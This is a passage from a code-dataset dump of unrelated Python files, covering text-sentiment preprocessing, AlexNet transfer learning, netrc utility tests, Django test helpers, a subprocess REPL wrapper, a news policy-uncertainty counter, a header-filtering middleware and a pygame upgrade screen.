'sentiment'\nFEATURE = 'review_body'\nFEATURES = [FEATURE]\n\n # Load data from single CSV or from multiple CSVs in multiple folders #################\n\ndef load_data(path_to_dir):\n \"\"\"Load data from single CSV or from multiple CSVs in multiple folders\"\"\"\n if '.csv' in path_to_dir:\n print('\\nReading {}...'.format(path_to_dir))\n df = pd.read_csv(path_to_dir)\n return df\n else:\n print('Processing files in {}...'.format(path_to_dir))\n # Get all non-zip folders/files in dir\n names = os.listdir(path_to_dir)\n folders = [name for name in names if not name.endswith('.zip')] # Remove names found for zips\n print('\\tNon-zip folders/files found in {}: {}'.format(path_to_dir, folders))\n # From each folder, read all CSV files into Pandas df\n dfs = []\n for folder in folders:\n try: \n data_dir = path_to_dir + '/' + folder + '/'\n csv_filenames = os.listdir(data_dir) \n for name in csv_filenames:\n df = pd.read_csv(data_dir + name)\n df['csv'] = name\n df['folder'] = folder\n dfs.append(df)\n except NotADirectoryError:\n print('\\tSkipping (not a directory):', data_dir)\n df_all = pd.concat(dfs, ignore_index=True)\n return df_all\n \n############################################################\n\n\n# Functions for data cleaning & prep ####################\n\ndef add_city_col(df):\n \"\"\"Add 'city' column from 'url'\"\"\"\n df['city'] = df['url'].str.split('-', expand=True).iloc[:, -2]\n return df\n\ndef add_loc_col(df):\n \"\"\"Add clean location column 'loc' from 'city'\"\"\"\n df['loc'] = df['city']\n locs_dict = {'New_York':'New_York', 'Tokyo':'Tokyo', 'Phuket':'Thailand', 'Bali':'Bali', \\\n 'Cuba':'Cuba', 'Domi':'Dominican_Republic', 'Dubai':'Dubai', 'Cayo_Guillermo':'Cuba', \\\n 'Pattaya':'Thailand', 'Uvero_Alto_Punta_Cana_La_Altagracia_Province_Do':'Dominican_Republic',\\\n 'Krabi':'Thailand', 'Chiang_Mai':'Thailand', 'Khao_Lak_Phang_Nga_Province':'Thailand',\\\n 'Bangkok':'Thailand'}\n for loc in locs_dict:\n df.loc[df[df['city'].str.contains(loc)].index, 'loc'] = locs_dict[loc]\n return df\n\ndef clean_usernames(df):\n \"\"\"Add 'user_name_clean' column from 'user_name'\"\"\"\n df['user_name_clean'] = df['user_name'].str.split('<', expand=True).iloc[:, 0]\n return df\n\n#######################################################\n\n\n# Fully clean & prepare data #########################\n\ndef clean_and_prep(df):\n \"\"\"Fully clean & prepare data\"\"\"\n print('Cleaning data...')\n # # Change 'review_date' to datetime type\n # df['review_date'] = pd.to_datetime(df['review_date'])\n\n # Drop duplicate rows\n df = df.drop_duplicates()\n # Fill nulls for 'user_location' with 'n/a'\n df = df.fillna({'user_location': 'n/a'})\n\n # # Add col 'review_length' from 'review_body'\n # df['review_length'] = df['review_body'].str.len()\n\n # Get 'city' from 'url'\n df = add_city_col(df)\n # Get clean location 'loc' from city col\n df = add_loc_col(df)\n\n # # Clean 'user_name'\n # df = clean_usernames(df)\n\n # Add 'sentiment' column mapped by 'rating'\n df['sentiment'] = df['rating'].map({1: 'negative', 2: 'negative', 3: 'neutral', 4:'positive', 5:'positive'})\n \n# # Add 'sentiment' column mapped by 'sentiment'\n# df['polarity'] = df['sentiment'].map({'negative': 0, 'neutral': 0.5, 'positive': 1})\n# # Add 'sentiment_int' column mapped by 'sentiment'\n# df['sentiment_int'] = (df['polarity'] * 2).astype(int)\n# # Move 'sentiment' col to be last\n# last_col = df.pop('sentiment')\n# df.insert(df.shape[1], 'sentiment', last_col)\n return df\n\n#######################################################\n\n\n### NOTE: Train-test-val split and train undersampling below use random state/seed=42 \n### for reproducibility.\n\n# Train-test-val split ###################################\n\ndef train_test_val_split(df, target=TARGET):\n \"\"\"Train-test-val split - shuffled, stratified, 80:20 ratios --> 64/20/16 train/test/val\"\"\"\n train_df, test_df = train_test_split(df, test_size=0.2, shuffle=True, \\\n stratify=df[target], random_state=42)\n train_df, val_df = train_test_split(train_df, test_size=0.2, shuffle=True, \\\n stratify=train_df[target], random_state=42)\n\n print('\\tTrain: {}, Test: {}, Val: {}'.format(train_df.shape[0], test_df.shape[0], val_df.shape[0]))\n \n return train_df, test_df, val_df\n\n#######################################################\n\n# Undersample train due to class imbalance ###################################\n\ndef undersample_train(train_df, target=TARGET):\n \"\"\"Undersample train due to class imbalance\"\"\"\n y_train = train_df[target]\n # Get classes and counts\n unique, counts = np.unique(y_train, return_counts=True)\n\n # Determine majority, middle, and minority classes\n majority_class = unique[np.argmax(counts)]\n minority_class = unique[np.argmin(counts)]\n mid_class = (set(unique) - set([majority_class, minority_class])).pop()\n print('\\tMajority Class: {}, Middle Class: {}, Minority Class: {}'.format(majority_class, mid_class, minority_class))\n\n # Get indices per class\n class_indices = dict.fromkeys([majority_class, mid_class, minority_class])\n for key in class_indices:\n class_indices[key] = train_df[train_df[target]==key].index\n print('\\t\\tNumber {} in train: {}'.format(key, class_indices[key].shape[0]))\n\n # Randomly under-sample majority and middle class indices to get new under-sampled train df\n np.random.seed(42)\n rand_maj_indices = np.random.choice(class_indices[majority_class], class_indices[minority_class].shape[0], replace=False)\n rand_mid_indices = np.random.choice(class_indices[mid_class], class_indices[minority_class].shape[0], replace=False)\n undersample_indices = np.concatenate([class_indices[minority_class], rand_mid_indices, rand_maj_indices])\n\n train_df_us = train_df.loc[undersample_indices,:]\n print('\\tFinal undersampled train size:', train_df_us.shape[0])\n return train_df_us\n\n#######################################################\n\n\n# Complete preprocessing, splitting, undersampling #################################################\n\ndef preprocess_split_undersample(path):\n \"\"\"Complete preprocessing, splitting, undersampling\"\"\"\n train_df, test_df, val_df = preprocess_split(path)\n\n train_df_us = undersample_train(train_df)\n \n return train_df_us, test_df, val_df\n\n############################################################\n\n\n# Complete preprocessing, train-test-val split #################################################\n\ndef preprocess_split(path):\n \"\"\"Complete preprocessing, train-test-val split\"\"\"\n # Data preprocessing\n df = load_data(path)\n df = clean_and_prep(df)\n\n # Train/test/val split\n print('\\nSplitting data into train/test/val...')\n train_df, test_df, val_df = train_test_val_split(df)\n\n return train_df, test_df, val_df\n\n############################################################\n\n\n# NLP ##################################################\n\ndef my_tokenizer(str_input):\n \"\"\"Tokenize with NLTK's SnowballStemmer, remove non-alpha chars\"\"\"\n stemmer = SnowballStemmer('english')\n stemmed_stopwords = set_stopwords()\n\n tokenizer = RegexpTokenizer(r\"[a-zA-Z]+\")\n tokens = tokenizer.tokenize(str_input)\n\n words = [stemmer.stem(word) for word in tokens if word not in stemmed_stopwords]\n return words\n\ndef set_stopwords():\n \"\"\"Snowball-Stem English stopwords, \n list found at http://www.textfixer.com/resources/common-english-words.txt\"\"\"\n stemmer = SnowballStemmer('english')\n STOPWORDS = \"a,able,about,across,after,all,almost,also,am,among,an,and,any\"+\\\n \"are,as,at,be,because,been,but,by,can,could,dear,did,do,does,either\"+\\\n \"else,ever,every,for,from,get,got,had,has,have,he,her,hers,him,his\"+\\\n \"how,however,i,if,in,into,is,it,its,just,least,let,like,likely,may\"+\\\n \"me,might,most,must,my,neither,no,of,off,often,on,only,or,other,our\"+\\\n \"own,rather,said,say,says,she,should,since,so,some,than,that,the,their\"+\\\n \"them,then,there,these,they,this,tis,to,too,twas,us,wants,was,we,were\"+\\\n \"what,when,where,which,while,who,whom,why,will,with,would,yet,you,your\"\n STOPWORDS = STOPWORDS.split(',') \n stemmed_stopwords = set([stemmer.stem(word) for word in STOPWORDS])\n return stemmed_stopwords\n\ndef count_vectorize(texts):\n stemmed_stopwords = set_stopwords()\n count_vect = CountVectorizer(tokenizer=tokenizer, stop_words=tokenized_stop_words, max_features=5000)\n matrix = count_vect.fit_transform(texts)\n results = pd.DataFrame(matrix.toarray(), columns=count_vect.get_feature_names())\n return results\n\ndef tfidf_cv(X, y, model, cv=5, scoring=['accuracy']):\n clf = Pipeline([('tfidf', TfidfTransformer()), \\\n ('model', model)])\n scores = cross_validate(clf, X, y, scoring=scoring, cv=cv, return_train_score=True)\n print('\\t\\tScores: {}'.format(scores))\n return scores\n\n############################################################\n\n\nif __name__ == \"__main__\":\n try: \n path = sys.argv[1]\n action = sys.argv[2]\n except IndexError:\n print('Please specify path to data files and action (\"model\").')\n sys.exit()\n\n # Data preprocessing\n train_df_us, test_df, val_df = preprocess_split_undersample(path)\n\n X_train_us = train_df_us[FEATURE].to_list()\n y_train_us = train_df_us[TARGET].to_numpy()\n\n print('\\nGetting bag of words for train data...')\n X_train_us_vect = count_vectorize(X_train_us)\n\n if action == 'model': \n # Modeling\n print('\\nStarting modeling...')\n\n lr = LogisticRegression(multi_class='multinomial', solver='newton-cg')\n mnb = MultinomialNB()\n rf = RandomForestClassifier()\n gb = GradientBoostingClassifier()\n xc = xgb.XGBClassifier()\n\n # models = dict.fromkeys([lr]) # single model test\n models = dict.fromkeys([lr, mnb, rf, gb, xc])\n\n for key in models:\n print('\\n\\tFitting {}...'.format(key.__class__.__name__))\n scores = tfidf_cv(X_train_us_vect, y_train_us, key, cv=5)\n models[key] = scores\n print('\\t\\tAverage train accuracy:', np.mean(models[key]['train_accuracy']))\n print('\\t\\tAverage test accuracy:', np.mean(models[key]['test_accuracy']))\n print('\\n')\n\n else:\n print('Unknown action:', action)","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"369480443","text":"import pickle\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom alexnet import AlexNet\nimport time\nimport skimage.transform\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#%%函数定义区\ndef evaluate(X_data, y_data,sess,logits,one_hot_y,BATCH_SIZE):\n '''\n logits:网络的直接输出\n one_hot_y:验证信息的输入经过变化以后的输出\n '''\n num_examples = len(X_data)\n total_accuracy = 0\n #生成验证\n correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot_y, 1))\n accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset+BATCH_SIZE], y_data[offset:offset+BATCH_SIZE]\n batch_x = ProcessFigs(batch_x)\n accuracy = sess.run(accuracy_operation, feed_dict={x_RGB: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\ndef ProcessFigs(Figs):\n '''\n 这个函数用于将输入的图片库文件转换为flot32格式,扩展图片,调换RB,一般化\n '''\n FigOut = np.zeros([np.shape(Figs)[0],227,227,3])\n for Counter in range(np.shape(Figs)[0]):\n AFig = Figs[Counter,:,:,:]\n AFig = skimage.transform.resize(AFig,[227,227],preserve_range = True)\n AFig = AFig - np.mean(AFig)\n AFig[:, :, 0], AFig[:, :, 2] = AFig[:, :, 2], AFig[:, :, 0]\n FigOut[Counter,:,:,:] = AFig[np.newaxis,:,:,:]\n return FigOut\n#TODO: Load traffic signs data.\n#%%调入存储的数据文件\npickle_file = './train.p'\nwith open(pickle_file, 'rb') as f:\n pickle_data = pickle.load(f)\n \n X = pickle_data['features']\n y = pickle_data['labels']\n \n del pickle_data # Free up memory\n \n# TODO: Split data into training and validation sets.\n#%%将数库分裂为训练集和验证集\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15)\ndel X\ndel y\n\n#%%创建运行场景\nsess = tf.Session()\n\n# TODO: Define placeholders and resize operation.\n#%% 设置图片格式转换层\nwith tf.name_scope('Transform_RGB'):\n x_RGB = tf.placeholder(tf.float64, (None, 227, 227, 3))\n x_RGB = tf.cast(x_RGB,tf.float32)\n\n# TODO: pass placeholder as first argument to `AlexNet`.\n#%% 与AlexNet连接,并设置反传信息中断层\nwith tf.name_scope('AlexNet'):\n fc7 = AlexNet(x_RGB, feature_extract=True)\n #fc7 = AlexNet(resized_x, feature_extract=True)\n # NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards\n # past this point, keeping the weights before and up to `fc7` frozen.\n # This also makes training faster, less work to do!\n fc7 = tf.stop_gradient(fc7)\n\n# TODO: Add the final layer for traffic sign classification.\n#%%添加新加入的空白层等待训练并适配网络\nwith tf.name_scope('New_add1'):\n mu = 0\n sigma = 0.1\n weight8 = tf.Variable(tf.truncated_normal([4096,43],mean = mu, stddev = sigma),name = 'weight8')\n bias8 = tf.Variable(tf.zeros(43),name = 'bias8')\n Mux8 = tf.matmul(fc7,weight8)\n logits8 = tf.add(Mux8,bias8)\n \n\n# TODO: Define loss, training, accuracy operations.\nwith tf.name_scope('Train_price'):\n y = tf.placeholder(tf.uint8, (None))\n one_hot_y = tf.one_hot(y,43,dtype = tf.float32)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=one_hot_y, logits=logits8)\n loss_operation = tf.reduce_mean(cross_entropy)\n \n# TODO: Train and evaluate the feature extraction model.\n#%%生成优化器\nrate = 0.001\noptimizer = tf.train.AdamOptimizer(learning_rate = rate)\n#主要,这里要指定训练的变量\ntraining_operation = optimizer.minimize(loss_operation,var_list = [weight8, bias8])\n\n\nEPOCHS = 50\nBATCH_SIZE = 128\n\n#执行优化过程\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nnum_examples = len(X_train)\nprint(\"Training...\")\nprint()\nfor i in range(EPOCHS):\n X_train, y_train = shuffle(X_train, y_train)\n StartTime = time.clock()\n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n batch_x = ProcessFigs(batch_x)\n _,Out = sess.run([training_operation,loss_operation], feed_dict={x_RGB: batch_x, y: batch_y})\n print(Out)\n EndTime = time.clock()\n print(\"这是第{}次训练完成\".format(i+1))\n print(\"这次训练的使用时间:{}\".format(EndTime - StartTime))\n print(\"检测一下准确程度:\")\n validation_accuracy = evaluate(X_test,y_test,sess,logits8,one_hot_y,BATCH_SIZE)\n print(validation_accuracy)\n print(\"~~~~~~~~~~~~~~~~~~~~\")\n if validation_accuracy > 0.98:\n break\n\n\n\n","sub_path":"train_feature_extraction.py","file_name":"train_feature_extraction.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"6116898","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport re\nimport unittest\nfrom contextlib import contextmanager\n\nfrom mock import MagicMock, mock_open, patch\n\nfrom pants.util.netrc import Netrc\n\n\n@patch('os.path')\nclass TestNetrcUtil(unittest.TestCase):\n\n class MockOsPath(MagicMock):\n def __init__(self):\n super(TestNetrcUtil.MockOsPath, self).__init__()\n self.expanduser.return_value = '~/.netrc'\n self.exists.return_value = True\n\n def test_netrc_success(self, MockOsPath):\n with patch('pants.util.netrc.NetrcDb') as mock_netrc:\n instance = mock_netrc.return_value\n instance.hosts = {'host': ('user', 'user', 'passw0rd')}\n instance.authenticators.return_value = ('user', 'user', 'passw0rd')\n netrc = Netrc()\n netrc._ensure_loaded()\n\n def test_netrc_file_missing_error(self, MockOsPath):\n MockOsPath.exists.return_value = False\n netrc = Netrc()\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert str(exc.exception) == 'A ~/.netrc file is required to authenticate'\n\n def test_netrc_parse_error(self, MockOsPath):\n with self.netrc('machine test') as netrc:\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert re.search(r'Problem parsing', str(exc.exception))\n\n def test_netrc_no_usable_blocks(self, MockOsPath):\n with self.netrc('') as netrc:\n with self.assertRaises(netrc.NetrcError) as exc:\n netrc._ensure_loaded()\n assert str(exc.exception) == 'Found no usable authentication blocks in ~/.netrc'\n\n @contextmanager\n def netrc(self, netrc_contents):\n m = mock_open(read_data=netrc_contents)\n with patch('__builtin__.open', m):\n netrc = Netrc()\n yield netrc\n","sub_path":"tests/python/pants_test/util/test_netrc.py","file_name":"test_netrc.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"541311919","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nfrom django.contrib.auth.models import User\n\nimport data.models as models\n\nclass TestCase:\n '''Holds all data from the api_test_cases.csv file.'''\n def __init__(self, row):\n self.test_case = row[0]\n self.test_id = row[1]\n self.url = row[2]\n self.method = row[3]\n self.request = json.loads(row[4]) if row[4] else {}\n self.username = row[5]\n self.status_code = row[6]\n self.full_response = json.loads(row[7]) if row[7] else {} \n self.json_expression = row[8]\n self.parsed_response = json.loads(row[9]) if row[9] else {} \n\nclass TestCases:\n '''Read in all the test cases in the api_test_cases.csv file and parse them into\n a dictionary keyed by test case name.'''\n def __init__(self):\n self.test_case_path = f\"{os.environ['CUSTOM_FF_PATH']}/common/api_test_cases.csv\"\n with open(self.test_case_path) as test_case_file:\n self.test_case_data = test_case_file.read().splitlines()\n if not self.test_case_data:\n raise ValueError(\"The test case data csv file is empty.\")\n self.test_case_data = self.test_case_data[1:]\n self.test_cases = {}\n def get(self):\n for row in self.test_case_data:\n row = row.split('\\t')\n this_test_case = TestCase(row)\n case_name = this_test_case.test_case\n if case_name not in self.test_cases:\n self.test_cases[case_name] = []\n self.test_cases[case_name].append(this_test_case)\n return self.test_cases \n\nclass TestData:\n '''A single point to create and reference data needed during testing.'''\n def __init__(self):\n self.user = [row for row in User.objects.all()]\n self.league = [] \n self.leaguestat = []\n self.lineup = []\n self.member = []\n self.statcondition = []\n # map for string -> class name lookups\n self.models = {'League': models.League, 'LeagueStat': models.LeagueStat, \n 'Lineup': models.Lineup, 'Member': models.Member, \n 'StatCondition': models.StatCondition} \n def create(self, model_name, **kwargs):\n model = self.models[model_name]\n data = model.objects.create(**kwargs)\n getattr(self, model_name.lower()).append(data)","sub_path":"postgres_backend/data/tests/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58158380","text":"# Copyright (c) Stanford University, The Regents of the University of\n# California, and others.\n#\n# All Rights Reserved.\n#\n# See Copyright-SimVascular.txt for additional details.\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject\n# to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER\n# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, unicode_literals, print_function, division\n\nimport subprocess\nimport os\nimport sys\nimport re\nimport signal\nfrom subprocess import Popen\nfrom codecs import getencoder, getincrementaldecoder\n\nPY3 = sys.version_info[0] == 3\n\nPOSIX = False\n\nclass SubprocessRepl(object):\n def __init__(self, cmd):\n self.encoder = getencoder('utf8')\n self.decoder = getincrementaldecoder('utf8')()\n self.popen = Popen(cmd, bufsize=1,\n stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n if POSIX:\n flags = fcntl.fcntl(self.popen.stdout, fcntl.F_GETFL)\n fcntl.fcntl(self.popen.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n\n def is_alive(self):\n return self.popen.poll() is None\n\n def read_bytes(self):\n out = self.popen.stdout\n if POSIX:\n while True:\n i, _, _ = select.select([out], [], [])\n if i:\n return out.read(4096)\n else:\n # this is windows specific problem, that you cannot tell if there\n # are more bytes ready, so we read only 1 at a times\n\n while True:\n byte = self.popen.stdout.read(1)\n # debugging code\n #file1 = open(\"C:\\\\tmp\\\\stdout.tcl.txt\",\"ab\")\n #file1.write(byte)\n #file1.close()\n if byte == b'\\r':\n # f'in HACK, for \\r\\n -> \\n translation on windows\n # I tried universal_endlines but it was pain and misery! :'(\n continue\n return byte\n\n def write(self, command):\n (bytes, how_many) = self.encoder(command)\n si = self.popen.stdin\n si.write(bytes)\n si.flush()\n #debugging code\n #file2 = open(\"C:\\\\tmp\\\\stdin.tcl.txt\",\"ab\")\n #file2.write(bytes)\n #file2.close()\n\n def reset_decoder(self):\n self.decoder = getincrementaldecoder('utf8')()\n\n def read(self):\n \"\"\"Reads at least one decoded char of output\"\"\"\n while True:\n bs = self.read_bytes()\n if not bs:\n return None\n try:\n output = self.decoder.decode(bs)\n except Exception as e:\n output = \"■\"\n self.reset_decoder()\n if output:\n return output\n \n","sub_path":"BuildWithMake/Release/Jupyter/linux/site-packages/simvascular_python_kernel/subprocess_repl.py","file_name":"subprocess_repl.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"124293348","text":"# encoding: utf-8\nimport jieba\nimport os\nimport pandas as pd\n\nDATA_DIR = 'D:/workspace/data/wallstreetcn'\nWORD_DIR = u'D:/Data/词库'\nCAIJING_WORD_FILE = u'%s/THUOCL_caijing.txt'%(WORD_DIR)\n\njieba.load_userdict(CAIJING_WORD_FILE)\n\ndef uncertainty(word_set):\n words1 = [u'政策', u'支出', u'预算', u'政治', u'利率', u'改革']\n flag1 = False\n for w in words1:\n if w in word_set:\n flag1 = True\n break\n if not flag1:\n return False\n words2 = [u'政府', u'背景', u'权威', u'官方']\n flag2 = False\n for w in words2:\n if w in word_set:\n flag2 = True\n break\n if not flag2:\n return False\n words3 = [u'央行', u'税收', u'监管', u'规定', u'中央银行', u'中国人民银行', u'赤字', u'TWO']\n for w in words3:\n if w in word_set:\n return True\n return False\n\ndef main(years):\n dic_tot, dic_pol = {}, {}\n for year in years:\n print(year)\n files = ['%s/%d/%s'%(DATA_DIR, year, f) for f in os.listdir('%s/%d'%(DATA_DIR, year))]\n for f in files:\n with open(f, 'r') as fp:\n text = fp.readlines()\n time = text[0].decode('utf-8').split('_')[0]\n time = time.strip()\n if time.find('-') == -1:\n time = time.replace(u'年', '-').replace(u'月', '-').replace(u'日', '')\n date = time.split(' ')[0]\n if not dic_tot.has_key(date):\n dic_tot[date] = 0\n if not dic_pol.has_key(date):\n dic_pol[date] = 0\n content = \" \".join(text[1:])\n content = jieba.cut(content)\n doc = set([word for word in content])\n dic_tot[date] += 1\n if uncertainty(doc):\n dic_pol[date] += 1\n df = pd.DataFrame({'tot': pd.Series(dic_tot), 'pol': pd.Series(dic_pol)})\n df = df.sort_index()\n df.to_excel('D:/Data/risk/policy_uncertainty.xlsx')\n\nif __name__ == '__main__':\n years = range(2010, 2019)\n main(years)\n ","sub_path":"Research/news-tracking/src/policy_uncertainty.py","file_name":"policy_uncertainty.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281086286","text":"\"\"\"Program to get current location from device corresponding to given API name\"\"\"\nimport asyncio\nfrom argparse import ArgumentParser\n\nfrom ..location import get_location_api_class, implemented_location_apis\n\n\nasync def print_location(device):\n print(await device.get_fix())\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('location_device', choices=implemented_location_apis, help='Location device to use')\n args = parser.parse_args()\n\n location_api_class = get_location_api_class(args.location_device)\n location_api = location_api_class()\n\n print(f\"Using {args.location_device} API\")\n\n loop = asyncio.get_event_loop()\n\n with location_api.get_device() as device:\n loop.run_until_complete(print_location(device))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"swarm/onboard/tools/get_location.py","file_name":"get_location.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"471536933","text":"# Copyright 2014 Donald Stufft\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport hmac\n\n\nclass XForwardedTokenMiddleware:\n\n header = \"HTTP_X_WAREHOUSE_ACCESS_TOKEN\"\n\n def __init__(self, app, token):\n self.app = app\n self.token = token\n\n def __call__(self, environ, start_response):\n # Filter out X-Forwarded-* headers from the request if the secret token\n # does not exist or does not match.\n if not hmac.compare_digest(environ.pop(self.header, \"\"), self.token):\n for key in set(environ.keys()):\n if key.startswith(\"HTTP_X_FORWARDED_\"):\n del environ[key]\n\n return self.app(environ, start_response)\n","sub_path":"warehouse/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"185595710","text":"import pygame\r\n\r\nclass Upgrade:\r\n\r\n\tdef __init__(self, Upgrade):\r\n\t\tself.settings = Upgrade.settings\r\n\t\tself.screen = Upgrade.screen\r\n\t\tself.screen_rect = self.screen.get_rect()\r\n\t\tself.stats = Upgrade.stats\r\n\t\tself.token = Upgrade.token\r\n\r\n\t\t#upgrade physical attack\r\n\t\tself.attack = pygame.image.load(\"img/upgrader/damage_upgrade.png\")\r\n\t\tself.attack_rect = self.attack.get_rect()\r\n\t\tself.attack = pygame.transform.scale(self.attack, (3*self.attack_rect.width//2, 3*self.attack_rect.height//2))\r\n\r\n\t\t#upgrade pyhsical and magic defense\r\n\t\tself.defense = pygame.image.load(\"img/upgrader/defense_upgrade.png\")\r\n\t\tself.defense_rect = self.defense.get_rect()\r\n\t\tself.defense = pygame.transform.scale(self.defense, (3*self.defense_rect.width//2, 3*self.defense_rect.height//2))\r\n\r\n\t\t#upgrade health points' capacity\r\n\t\tself.capacity = pygame.image.load(\"img/upgrader/hp_upgrade.png\")\r\n\t\tself.capacity_rect = self.capacity.get_rect()\r\n\t\tself.capacity = pygame.transform.scale(self.capacity, (3*self.capacity_rect.width//2, 3*self.capacity_rect.height//2))\r\n\r\n\t\t#background for upgrade\r\n\t\tself.bg_criteria = pygame.image.load(\"img/upgrader/latar_upgrade_tegak.png\")\r\n\t\tself.bg_criteria_rect = self.bg_criteria.get_rect()\r\n\r\n\t\t#button for upgrade\r\n\t\tself.button = pygame.image.load(\"img/upgrader/button.png\")\r\n\t\tself.button_rect = self.button.get_rect()\r\n\r\n\tdef draw_background(self):\r\n\t\t#drawing background for pyschical attack upgrade\r\n\t\tself.bg_attack = self.bg_criteria\r\n\t\tself.bg_attack_rect = self.bg_attack.get_rect()\r\n\t\tself.bg_attack_rect.midleft = self.screen_rect.midleft\r\n\t\tself.bg_attack_rect.x += 90\r\n\t\tself.bg_attack_rect.y += 40\r\n\r\n\t\t#drawing background for defense upgrade\r\n\t\tself.bg_defense = self.bg_criteria\r\n\t\tself.bg_defense_rect = self.bg_defense.get_rect()\r\n\t\tself.bg_defense_rect.center = self.screen_rect.center\r\n\t\tself.bg_defense_rect.y += 40\r\n\r\n\t\t#drawing background for capacity upgrade\r\n\t\tself.bg_capacity = self.bg_criteria\r\n\t\tself.bg_capacity_rect = self.bg_capacity.get_rect()\r\n\t\tself.bg_capacity_rect.midright = self.screen_rect.midright\r\n\t\tself.bg_capacity_rect.y += 40\r\n\t\tself.bg_capacity_rect.x -= 90\r\n\r\n\t\t#drawing to the screen\r\n\t\tself.screen.blit(self.bg_attack, self.bg_attack_rect)\r\n\t\tself.screen.blit(self.bg_defense, self.bg_defense_rect)\r\n\t\tself.screen.blit(self.bg_capacity, self.bg_capacity_rect)\r\n\r\n\tdef draw_icon(self):\r\n\t\t#draw icon for physical upgrade\r\n\t\tself.attack_rect.center = self.bg_attack_rect.center\r\n\t\tself.attack_rect.y -= 100\r\n\t\tself.attack_rect.x -= 5\r\n\r\n\t\t#draw icon for defense upgrade\r\n\t\tself.defense_rect.center = self.bg_defense_rect.center\r\n\t\tself.defense_rect.y -= 100\r\n\t\tself.defense_rect.x -= 3\r\n\r\n\t\t#draw icon for capacity upgrade\r\n\t\tself.capacity_rect.center = self.bg_capacity_rect.center\r\n\t\tself.capacity_rect.y -= 100\r\n\t\tself.capacity_rect.x -= 5\r\n\r\n\t\t#draw all icon\r\n\t\tself.screen.blit(self.attack, self.attack_rect)\r\n\t\tself.screen.blit(self.defense, self.defense_rect)\r\n\t\tself.screen.blit(self.capacity, self.capacity_rect)\r\n\r\n\tdef draw_button(self):\r\n\t\t#draw button for physical upgrade\r\n\t\tself.attack_button = self.button\r\n\t\tself.attack_button_rect = 